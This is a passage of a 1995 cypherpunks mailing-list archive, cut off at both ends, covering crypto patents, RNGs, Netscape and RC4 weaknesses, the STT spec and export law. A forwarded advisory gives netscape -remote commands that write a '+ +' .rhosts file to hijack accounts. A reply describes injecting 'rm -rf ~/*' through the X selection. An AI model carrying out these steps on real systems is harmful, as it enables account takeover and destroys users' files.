    "Therefore, after April 6, 1990, RSA has a right to license its
    (RSA's) software to third-parties but does not have the right to
    license such third-parties under the Stanford patents."

So, their answer appears to be correct only if the RSA software doesn't
infringe the Stanford patents.  And that seems to be a matter of opinion.
Furthermore, the next sentence in the order continues:

    "To the extent RSA provides code to third-parties which causes an 
    infringement of a valid and enforceable claim of the Stanford patents,
    assuming the third party is not separately licensed under the Stanford
    patent [sic], nothing in this order shall prevent Cylink from pursuing
    its rights under the Stanford patents against such third party."


That's pretty clear to me folks, but make your own judgements.


>                                                                         If 
>      you're using RSA's software -you didn't write your own- you don't need 
>      a separate patent license under either the MIT or Stanford patents.

Again, only to the extent that you're not infringing the Stanford patents.


So, pay your nickel, take your chances.  Does RSA's software infringe
the Stanford patents?

(Of course these are my opinions, not my company's)


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 29 Sep 95 06:35:40 PDT
To: cypherpunks@toad.com
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509282349.TAA00187@hoopsnake.cjs.net>
Message-ID: <doug-9508291335.AA00652565@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>> One initial connection is all that is needed to have a secure
>> connection for the lifetime of the two communicating parties. This
>> initial connection can be accomplished via any number of ways. It
>> does involve an initial one time only shared secret. This is much
>> different than the many shared secrets and key management issues of
>> private and public key systems.  For the initial connection you can
>> stick the machines back to back if you are really worried about
>> security. This initial transaction serves as a seed for subsequent
>> transactions. All subsequent transactions depend on preceding
>> transactions. A degree of randomness comes from the randomness of
>> the messages. Each next word in the message is random.
>
>I'm a little new to this, but I thought the whole idea behind keys was
>not having to whisper "secrets" to someone on the other side of a
>crowded mall. Most people don't have the luxary of connecting their
>computers back to back with someone on the other side of the world
>just to ensure a secure communications path. Ther would have to be
>some mechnisms to ensure that secure delivery of your "secret", and
>that brings us back to key management, so the whole thing is rather
>self defeating.
>
>Christopher
>
>
>

Remember, that's only one of the options for the truly paranoid. If you want,
you can just use their (for now secret) keying implementation on the floppy
disk for the first exchange.
 I feel a little uncomfortable with this at the moment (as I'm sure do most
of the other readers). The algorithm, once revealed should be a very interesting
read.
 However, this does not bring us back to key management in the sense of
traditional public or private cryptosystems. Since the entire communication
hinges on the first successful exchange, this is the exchange where they
key is most critical. I believe they have an option for entering a secret
key (initialization vector it seems) as well. So, presumable you could call
somebody on the phone, or send them a PGP message, or whatever, to exchange
this initial key. 
 It still seems to me that once this initial communication is out of the way,
that the product will work fairly well. I see it as an excellent way, in
our situation, to provide remote professors and students secure communication
paths to our network in the future (hinging on the development of some kind
of telnet client).  I rather think that the whole public/private key
thing is self-defeating... computers get more powerful, key gets hacked...
key size increases.. etc.. etc.. This sounds like a novel alternative. People
interested in non-disclosure analsysis may wish to contact the company.

Elementrix: 212-888-8879, 850 Third Avenue NY, NY 10022 (North America
office)

I'm not sure what, if any, real cryptanalysis has been done on this. David
Kahn himself admitted he wasn't an expert cryptanalyst. I don't know if anybody
has done any in depth review or subjected it to differential cryptanalysis
of any kind.

 It seems to be a OTP/stream cipher of some kind.. subsequent number depending
on previous numbers. I don't know if its possible to prove that the sequence
will never repeat, having not seen the algorithm. But if it did not, it would
seem to be strong enough. Too many questions, too few answers.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Sep 95 08:39:00 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac9161a3050210040cbd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:14 PM 9/28/95, cjs wrote:
>Hello all.
>
>Someone mentioned this on IRC last night, and it sounded like a really
>cool idea, so I thought I'd mention it.
>
>The idea is to generate random numbers using a geiger counter tube and
>a small portion of radioactive substance (like perhaps the stuff they
>use in smoke detectors?) Would that be random enough?
>
>I thought it was a neat idea anyway.


It's a well-known idea. My FAQ has a section on this, and the Cypherpunks
archives have many mentions of this.

For the newcomers, here are some of the issues, very briefly presented:

1. Incorporating a "Geiger counter tube" is nontrivial. A solid-state
detector does the same thing, and is a better approach.

2. Incorporating Am-241 or other alpha emitters in microcurie levels would
require licensing, regulatory oversight, etc., etc. Don't count on it.

3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K
counts per second) would be too radioactive to ship.

4. Zener diodes and other random noise sources are cheaper to build, more
consistent in output, and easier to integrate into actual products.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: millar@pobox.upenn.edu (Dave Millar)
Date: Fri, 29 Sep 95 06:29:07 PDT
To: cypherpunks@toad.com
Subject: Assessing Netscape Commerce Server Risk
Message-ID: <199509291328.JAA08472@pobox.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Would anyone care to critique this assessment?

>Q:  What is the risk of implementing the Commerce Server without waiting for
>the Oct. 9 patch (which fixes the randomness problem with the server's
>public/private key pair)?

>A: The exposure is essentially this: if someone were to make a concerted
>attack on your public/private key pair, they might be able to discover your
>private key.  Combined with net eavesdropping this would allow interception
>and decrypting of SSL-encrypted traffic to your Commerce Server, and
>combined with IP address and DNS domain impersonation would allow someone
>to masquerade as your server.
>
>I would characterize this risk as low to moderate, with the higher risk
>only applying if your Commerce Server is handling larger financial
>transactions or extremely sensitive information.
>
>The time required for an attack on your key pair depends on how close the
>attacker can come to guessing exactly when your key pair was generated, and
>what the pid/ppid were for the key generation program at the time the key
>was generated, as well as how fast the attacker can generate candidate key
>pairs.  Since the time and pid/ppid are probably guessable only within
>broad limits (e.g., within a few days for the time), and generating key
>pairs takes on the order of a second or so, the estimated attack times are
>much longer than the attack times for SSL messages.  I believe Netscape has
>published estimates like 60 days or so to crack a key pair; even if those
>estimates are too high by factors of two or three the times are still
>comparable to the time until the patch is available.
>
>So if you're really concerned you can certainly eliminate the risk by
>shutting down SSL-secure services until you get the patch; however I'd
>weigh that against the downside of not having those services accessible.
>
>P.S. If you do continue running your Commerce Server with SSL, one simple
>thing that might help thwart attacks is to do a "touch" on your server key
>file and server certificate file (or copy them somewhere and then copy them
>back) to update the date/time modified on the files.  This eliminates one
>possible clue as to when the key pair was generated.

_________________________________________________
Dave Millar  University Information Security Officer
3401 Walnut St., Suite 265C
Philadelphia, PA 19104-6228
University of Pennsylvania
For security matters:  security@isc.upenn.edu (read by Data Admin. staff)

Other matters: millar@pobox.upenn.edu
voice: (215) 898-2172
fax: (215) 898-1729
For PGP 2.6 Public key: http://www.upenn.edu/security-privacy/
PGP Fingerprint:   28 FB 09 DC C7 96 C2 53  1A B8 BE 3B 73 32 46 4C   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 09:40:25 PDT
To: perry@piermont.com
Subject: Re: Hack Microsoft
In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com>
Message-ID: <199509291635.JAA06820@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As of 9:34AM on the day of the release hackmsoft has so far
received -two- microsoft bugs and exploits.

> 
> 
> John Young writes:
> >    9-28-95. W$Japer:
> > 
> >       Regarding Netscape, Mr. Dent of Microsoft said the
> >       firm's security deficiencies that have recently come to
> >       light have "tainted" electronic commerce on the
> >       Internet.
> 
> Thats almost an invitation to hack Microsoft's web products, isn't it?
> 
> (Anyone from Netscape care to join in the fun?)
> 
> Perry
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 09:55:35 PDT
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <199509291644.JAA07516@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	That's called an X hole, not a netscape hole.

> 
> 
> Haven't seen this on the cypherpunks yet, sorry if this has been here=20
> already.=20
> 
> Juri
> 
> <o       J=FCri Kaljundi          e-mail: jk@digit.ee         o<
>  >o                             tel: +372 6308994            o>
> <o       DigiTurg               http://www.digit.ee/        o<
> 
> ---------- Forwarded message ----------
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.=20
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
> 
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
> 
> - make a text file containing only "+ +" accessible (as file, as URL, or
>   whatever you like) to the target Netscape client. This is quite easy, eit=
> her
>   if you have a personal WWW page (http://... URL) or an account on the
>   target machine (file://... URL), or even by uploading it to an anon FTP
> 
> - set your DISPLAY environment variable to the target display
> 
> - run the following set of commands :
> 
>   netscape -noraise -remote "openURL(<put-your-URL-here>)"
>   netscape -noraise -remote "saveAs(.rhosts)"
>   netscape -noraise -remote back
> 
> In the second command, the path should be specified whenever possible=20
> (~ is not accepted).
> 
> If the target user does not already have a .rhosts and is not looking at th=
> at
> precise moment, then the chances are it worked !
> 
> Solution to the problem : every user concerned should either create a=20
> Xauthority file, or stop using Netscape.
> 
> =09MXK
> 
> 
> PS: WHY do they bother with PGP and RSA security when they keep such holes =
> ????
> 
> +------------------------------------+---------------------------------+
> |  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
> |  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
> |  75005 PARIS FRANCE                | 75005 PARIS                     |
> |  email: auroux@clipper.ens.fr      | FRANCE                          |
> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50.     |
> | After registering you will receive a fully functional .sig and all   |
> | updates for free.                                                    |
> +----------------------------------------------------------------------+
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 29 Sep 95 09:58:17 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To: <199509290354.XAA21646@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950929093904.2942A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Perry E. Metzger wrote:

> world, have real clients, and actually worry about this as a
> problem. This *is* a legitimate problem. Consider what the load on a
> web site using D-H key exchange for every connection gets like when
> you have millions of people hitting it every day.

This is the problem I was concerned about (actually RSA rather than D-H). 
In HTTP-NG, in addition to supporting PK for key exchanges and 
authentications, there is now support that allows most values used in the 
protocol to be signed. Now that non repudiability is becoming legally 
significant, there are all sort of things that either party might want to 
have signed, for example negotiation options (e.g. wont-log-transactions) 
and meta-information (e.g. kidcode: NC-17,barney-boffing).

More clients and more signings means that conventional chips arent't 
going to be economical for this.

[stuff on hardware]
> 
> The reason the market for this is weird is the same reason Sun took
> the DES chips off its motherboards years ago -- you can't conduct
> modern business with the fucked up export regime we are dealing with.

That's another question. A DSP chip can also be used for crypto - yet 
sound cards and nexts aren't ITARed, and aren't really considered 
dual-use. A Modular exponentiator isn't a crypto device  (hey - 
it's a bignum accelerator for Mathematica). Now, if I had a pipelined 
WSI chip capable of delivering one result per cycle, I could think of 
some useful applications, but ...

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 29 Sep 95 10:09:34 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Hack Microsoft
In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950929100423.2942B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Perry E. Metzger wrote:

> Thats almost an invitation to hack Microsoft's web products, isn't it?

Not a real attack- cos it's just a Denial Of Service, but it is kind of 
amusing... 

Windows NT has an interesting property in its handling of TCP connection 
establishment. NT has a small limit on the maximum size of its listen 
queue - it also handle queue overflow in a different way to BSD derived 
stacks. Instead of just dropping the connection request, and allowing the 
client TCP to retry automatically, NT sends a RST packet that aborts the 
connection. 

Ok, you can shutdown just about anything on the Net right now, and there 
won't be a real defence possible until IPSEC starts getting installed, 
but microsoft makes it much too easy. 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 10:16:59 PDT
To: Andrew Roos <AndrewR@beetle.vironix.co.za>
Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <199509291716.KAA06460@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 9/29/95 S, Andrew Roos <AndrewR@beetle.vironix.co.za> wrote:
>(This is a repeat because I posted the original 36 hours ago and it still   
>hasn't bounced back to me.)
Hmmm - I got it yesterday, so it did go out.

>The attack is based on two particularly interesting three-byte key
>prefixes which have a high probability of producing PRNG sequences
>which start with a known two-byte sequence. The prefixes are:
>1.  Keys starting with "00 00 FD" which have a 14% probability of
>    generating sequences which start "00 00".
>2.  Keys starting with "03 FD FC" which have a 5% probability of
>    generating sequences which start "FF 03".
[much interesting work deleted]

It sounds like any application using RC4 with random session keys
should start by testing session keys and rejecting any that
start with 00 00 or 03 FD; it means doing 2**-15 more random key
generations, and reducing the brute-force space by 2**-15,
but it's a pretty small reduction.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 10:17:42 PDT
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Q&A on the RSA/Cylink legal dispute
Message-ID: <199509291716.KAA06480@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:27 AM 9/29/95 -0400, Jeff Barber <jeffb@sware.com> wrote:
>That's pretty clear to me folks, but make your own judgements.
>>      If you're using RSA's software -you didn't write your own- you don't
need 
>>      a separate patent license under either the MIT or Stanford patents.
>Again, only to the extent that you're not infringing the Stanford patents.
>
>So, pay your nickel, take your chances.  Does RSA's software infringe
>the Stanford patents?

The RSA algorithm, and thus RSA's software, uses public-key cryptography,
and is therefore within the scope of the claims of the Merkle-Hellman
and/or Hellman-Pohlig patents.  Also, the recent RSAREF versions contain
Diffie-Hellman code, which is covered by the Diffie-Hellman patents (but
PGP doesn't use that version of RSAREF.)

On the other hand, the RSAREF license says that RSA will defend any patent
claims for use of its code (I forget if that was RSADSI or RSA Labs),
and Jim Bidzos confirms that that's still the case even after the PKP breakup.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Sep 95 10:35:41 PDT
To: cypherpunks@toad.com
Subject: "Who shall speak for us?"
Message-ID: <ac916a1a0702100409d8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The questions "Who are the Cypherpunks?" and  "Who shall speak for us?"
have come up several times, in different contexts:

-- Reporters want "human interest" stories for their other stories on
Netscape cracks, SSL challenges, arrests, executions, etc. They want to
know who we are, what our agenda is, what motivates us, and who our
spokesmen are.

-- "Who shall be our Spokesman?" keeps coming up. "Who shall speak for us?"

-- There is once again talk about "getting organized" so as to better
compete with EPIC, EFF, CPSR, VTW, ACLU, etc. While no one is seriously
advocating a formal, dues-collecting organization, their is an undercurrent
of thought that we had better get more organized or we'll just be roadkill
on the information superduperhighway.

-- And there seems to be a sense of uneasiness amongst some of us that
there can't be a "Cypherpunks group" without organization, without
hierarchy.

In contrast, there have been points made that we are "nothing," not even a
group, and that we are only a set of mailing list subscribers. I think this
is too extreme a view, as we clearly have:

* some sense of membership in a group, some sense of cohesion, some sense
of "Us" vs. "Them."

* regional activities in several parts of the U.S. and in some non-U.S.
countries.

* a growing archive of postings, of knowledge gained through hard work.


So, we are _more_ than just the subscribers to a mailing list, but _less_
than a formal organization with shareholders, voters, elected officials,
and a Great Leader at the top.

What are we, then?

One parallel is to a bunch of folks who meet at a gathering spot, perhaps a
bar or pub. Perhaps a reading group, a book club.  People who talk,
speculate, exchange theories, and even decide on things that some of them
will do. Maybe these folks, an ever-changing set of folks, will come to
some commonly-held viewpoints, though not held by all folks, and not "voted
on" to be the Official Position of this informal gathering of folks at the
local bar.

Cyberspace allows for all sorts of new kinds of "watering holes" where such
emergent, loosely-organized, anarchic groups may develop. These "virtual
communities" are an incredibly important development. (My paper given at
Imagina '95, in Monte Carlo, "Crypto Anarchy and Virtual Communities," goes
into this in detail.)

Another parallel is to what is sometimes called an "invisible college."
Academic researchers in a country or around the world form a loose kind of
invisible college, a network of people at various institutions that share a
common interest and that have certain emergent standards. Think of the
cryptology researchers, or the fusion researchers, of the world. In this
invisible college, reputations matter. Some researchers are more esteemed
than others, some play different roles than others. Some of them are mostly
teachers, others are buried deeply in their laboratories.

And, as with the informal pub gathering, this invisible college does not
have to "vote" on an official position, or "elect" leaders.

Ah, I hear some of you pointing out, "But in fact some of these invisible
colleges _do_ elect officials and _do_ have official positions!" Indeed,
many invisible colleges develop subsets that have formal structures and
become the de facto _professional guilds_ for their organizations. The
American Association of Chiropractic Examiners, the French League of Graph
Paper Experts, the Russian Federation of Agriculturists, and on and on.
(More seriously, the American Bar Association, the American Medical
Associatio, etc.)

Often these "professional organizations" are designed to extend the reach
of these organizations, to give official titles to the early organizers,
and to lobby governments for laws favorable to their members. Often these
formal organizations adopt licensing rules and regulations to "police
themselves" and also, in well-known cases of "public choice" theory and
"rent-seeking behavior," to limit the number of competitors. Often the
other hierarchies, such as the State itself, endorse the rules adopted by
the professional guilds.

(I'm not saying anyone is directly arguing that the Cypherpunks, not even
by innuendo, become a professional guild, but some of the clamoring about
how we need to adopt a less threatening or strange name, organize ourselves
more hierchically, and present a more unified front is often a step toward
a rigid bureaucracy.)

It's been gratifying to me, at least, that the Cypherpunks group has not
fallen prey to this temptation, that in an important sense "we practice
what we preach." We claim to be an "anarchy," not a "hierarchy."

While it may be the case that each of us has his or her own personal
heirarchical ratings of others, it is important that we never have tried to
formalize or "vote on" these ratings. Or voted to elect a Great Leader.

Our strength is in our numbers and in our ideas, not in the guy we have
ensconced in an office in Washington so he can give press conferences and
sound bites for journalists. Our strength is in our multi-headed (dare I
mention "Medusa"?), multinational, informal lack of structure.

"But how will _We_ compete with the organizations that have Washington
offices? How will we get "air time" if we have no Spokespunk in Washington,
or no list of Official Spokespunks that journalists can call to get The
Cypherpunks Slant on things? Who shall speak for us?"

The answer is simple: Let no one claim to speak for "us." Let no one claim
to be a speaker for others. Let journalists adjust to a new way of
speaking, a nonhierarchical way of saying "I think" and "My view is." Let
journalists contact the people actually doing something they are writing
about. Let journalists call the people directly involved, not the Official
Spokespunks. It may be _easier_ for some journalists to simply call the guy
they always call, just to get a "reaction quote," but our job is not to
make it easier for some lazy journalists.

And let those who dislike the name "Cypherpunks" call themselves something
else. Nothing's stopping them. Of course, it may be that the people wanting
a more conservative, more staid name also wish to "inherit" the mantle the
Cypherpunks now have, wish to convey to the "International Association of
Cybernetic Privacy Advocates," or whatever, the membership and reputation
of the current and past Cypherpunks. This, I think, is the "old way" of
doing things, the herd way.

If the views many of us have about anarchy and cyberspace are correct, this
way of operating represents the future. If not, who cares what we think?

--Tim May





---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 29 Sep 95 08:18:02 PDT
To: jsw@netscape.com
Subject: Re: netscape NSRANDFILE compatible with /dev/random ?
In-Reply-To: <199509282312.QAA26073@comsec.com>
Message-ID: <9509291514.AA15468@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: "Jeff Weinstein" <jsw@netscape.com>
>Date: Wed, 27 Sep 1995 00:40:41 -0700

>> What happens if NSRANDFILE is set to /dev/random ?
>> will netscape try to read an infinite number of random bytes ?
>
>  In the current patch it will read up to 1 megabyte before stopping.
>In 2.0 I will add a way to specify a size.  As a temporary hack you
>could use 'dd' to get the number of bytes you want into a file, then
>remove the file once netscape had started up.

or you can define a named pipe file (on UNIX at least) which
runs /dev/random through dd.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Fri, 29 Sep 95 09:52:54 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
Message-ID: <9508298123.AA812398949@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     on 9/24/95 karlton@neon.netscape.com (Phil Karlton) at Internet-USA 
     wrote:
     The random number seed generation code is now available for review:
     ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z
     
     My platform is DOS 6.22, Windows 3.11
     
     Can someone suggest a program (and where to get it) that will run on 
     my platform and extract the tar.z files into DOS ASCII files so that I 
     can review the key generator code?
     
     Thanks for your help.
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rajaram@morgan.com (P. Rajaram)
Date: Fri, 29 Sep 95 09:02:46 PDT
To: cypherpunks@toad.com
Subject: Traveling abroad with laptops
Message-ID: <9509291202.ZM20738@morgan.com>
MIME-Version: 1.0
Content-Type: text/plain



What would happen if I flew out of the US with a portable
computer that has crypto software (like PGP) installed ?
Assuming that I had no intention of distributing the software
abroad, would I be violating some US export law ?

Matt Blaze (?) had written about his humorous experience
in trying to do the right thing.  It seems that the US Govt.
does not seriously enforce its own export policies.  But
they may start doing so any time.  I am sure that today many
people regularly fly into Europe with crypto software,
without intending to break any laws.

At one point, I had heard that some sort of exception was
planned for export of crypto for personal use.  Does anyone
know if this is real or just a rumor ?

regards

-raj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 12:02:48 PDT
To: hallam@w3.org
Subject: Re: VISA and Microsoft STT Specs available
Message-ID: <199509291902.MAA23808@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM 9/29/95 -0400, Phill wrote:
>Yes, VISA put the ASCII on their site... 
>We only host the ps version.

Thanks!  I looked at the Visa site, and it has a usable form
of the documents still under construction; I waded through
the 73-separate-page HTML version for a while....
There's some good intro material on how you use the stuff and
who's responsible for what.

Microsoft has the technical specs as one big slightly-HTMLized
text file under http://www.windows.microsoft.com/windows/ie/stt.htm ;
it's _much_ more readable, and has a pointer to the Visa version.
(It's one big <PRE> with a few <B> and hrefs, in black-on-white.)

Some cryptographic high points, from a brief scan.
- 1024-bit RSA signatures, using PKCS#1 format.
- SHA 160-bit hashes
- Symmetric bulk crypto includes two options (I haven't yet seen
  how you choose between them; I assume it's export/domestic?)
  == RC4/64 with 24 bits of salt leaving 40 bits of real key
  == DES-CBC - yes, that's single-DES.  IV=0.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Fri, 29 Sep 95 12:34:44 PDT
To: cypherpunks@toad.com
Subject: STT is 40-bit for RC4, 56-bit for DES
Message-ID: <v03003502ac91f470ee63@[198.93.25.66]>
MIME-Version: 1.0
Content-Type: text/plain


From the STT spec, page 73:

6.8 CRYPTOGRAPHY

A. Encryption

Two bulk encryption algorithms are used in STT - RC4 and DES.

1. STT uses RC4 encryption with 8-byte keys, of which 3 bytes are salt,
in the clear. See the RC4Key entry under the Low Level Composites
sub-section of this document. RC4 is a stream cipher; there are no pad
bytes and the encrypted data is the same size as the plaintext data.

2. STT uses the Cipher Block Chaining (CBC) mode of DES, as defined in
Federal Information Processing Standard FIPS 81. The key is 8 bytes
long, with each byte having a parity bit in position 0. Thus there are
56 bits of random key. STT uses an all-zero byte Initialization Vector
(IV). A maximum of 8 bytes of padding is applied to every plaintext
message encrypted with DES to pad the message to a length that is a
multiple of 8 bytes. Pad bytes have a value of

      x = 8 - ((length of the plaintext) mod 8)

and the number of pad bytes is also x. For example, if the plaintext
message was 17 bytes long, then each of the 7 bytes of padding contains
the value 0x07. If x is 0, then there are 8 bytes, each containing
0x08. Padding is appended to the end of the plaintext before encryption
and is stripped off after decryption.

B. Signatures

STT uses PKCS #1 Encryption block formatting for RSA signatures. Total
length is 128 bytes for the signature (1024-bit modulus). The following
is the plaintext:

(TLV_SIGNATURE
    (BYTE[20] HashOfData)    ;Hash of the data being signed
    (BYTE 0)                 ;parser initializer
    (BYTE[105] 0xff)         ;padding
    (BYTE 0x01)              ;recom. for private key encryptions
    (BYTE 0))                ;overflow protection for RSA

C. Hashing

All hashes in STT are 20-byte SHA hashes. See Federal Information
Processing Standards FIPS 181 for the specification of SHA hashes.

________________________________________________________________________
Stephan Somogyi                Mr Gyroscope                Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Fri, 29 Sep 95 09:42:39 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <MAA03656.199509291639@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.3.89.9509291503.A1295-0100000@jamarillo>, Jyri Kaljundi writes
:
[...]
>There's a huge hole in the Netscape remote control mechanism for the
>X-Windows based clients.=20
>Potential impact : anybody can become any user that uses Netscape on any
>system without sufficient X security.
[...]
>PS: WHY do they bother with PGP and RSA security when they keep such holes =
>????

Well, I would susspect that because if your X server isn't "secure" there
isn't much you can do that is.

Other then xterm, most X programs will respond to "synthetic" events
(events gennerated by another programs as opposed to the user), this
means with a little work anyone with access to the X server could
click open the File menu, select "Open URL", type in a URL, press "Open",
click "SaveAs", and so on.

Even if all X clients stoped listening to synthetic events (which would
be a shame - since they are useful in various contexts) X's event
structure allows multiple X cleints to lissten for tthe same events on
the same windows, so a simple program could track all keystrokes and
capature your passwords.

Failing all of that any X client could track ownership of the X selection
(the "cut buffer" normally used to hold text), and when it looks like a
Unix command (implying that you will be pasting it into the command line)
assert ownership of the selection itself and put in "^X^U^H;rm -rf ~/*"
followed by a carrage return.

That's just off the top of my head ('tho I admit I have written two of
the three "exploits" while I was a sysadmin 4 years ago in an effort
to convinse my managers to mandate better security then "xhost +"...).

So saying "Netscape isn't secure when my X server isn't" is alot like
saying "When I leave the front door of my house unlocked my VCR isn't
safe!".
-- 
Not speaking for my employer, or anyone other then myself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 29 Sep 95 09:49:27 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: COE Document
Message-ID: <n1399743612.14225@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------------------------------------------------

A HTML Version of this document is available at the Privacy International 
Archives at www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html


                       Recommendation No. R (95) 13

               of the Committee of Ministers to Member States

                Concerning Problems of Criminal Procedure Law
                    Connected with Information Technology

       (Adopted by the Committee of Ministers on 11 September 1995
                at the 543 meeting of the Ministers' Deputies)

	The Committee of Ministers, under the terms of Article 15.b of the
Statute of the Council of Europe.

	Considering that the aim of the Council of Europe is to achieve a
greater unity between its members;

	Having regard to the unprecedented development of information
technology and its application in all sectors of modern society;

	Realizing that the development of electronic information systems
will speed up the transformation of traditional society into an
information society by creating a new space for all types of
communications and relations;

	Aware of the impact of information technology on the manner in
which society is organised and on how individuals communications and
interrelate;

	Conscious that an increasing part of economic and social relations
will take place through or by use of electronic information systems;

	Concerned at the risk that electronic information systems and
electronic information may also be used for committing criminal offenses;

	Considering that evidence of criminal offenses may be stored and
transferred by these systems;

	Noting that criminal procedure laws of members states often do not
yet provide for appropriate powers to search and collect evidence in these
systems in the course of criminal investigations;

	Recalling that the lack of appropriate special powers may impair
investigating authorities in the proper fufilment of their tasks in the
face of the ongoing development of information technology;

	Recognising the need to adopt the legitimate tools which
investigating authorities are afforded under criminal procedure laws the
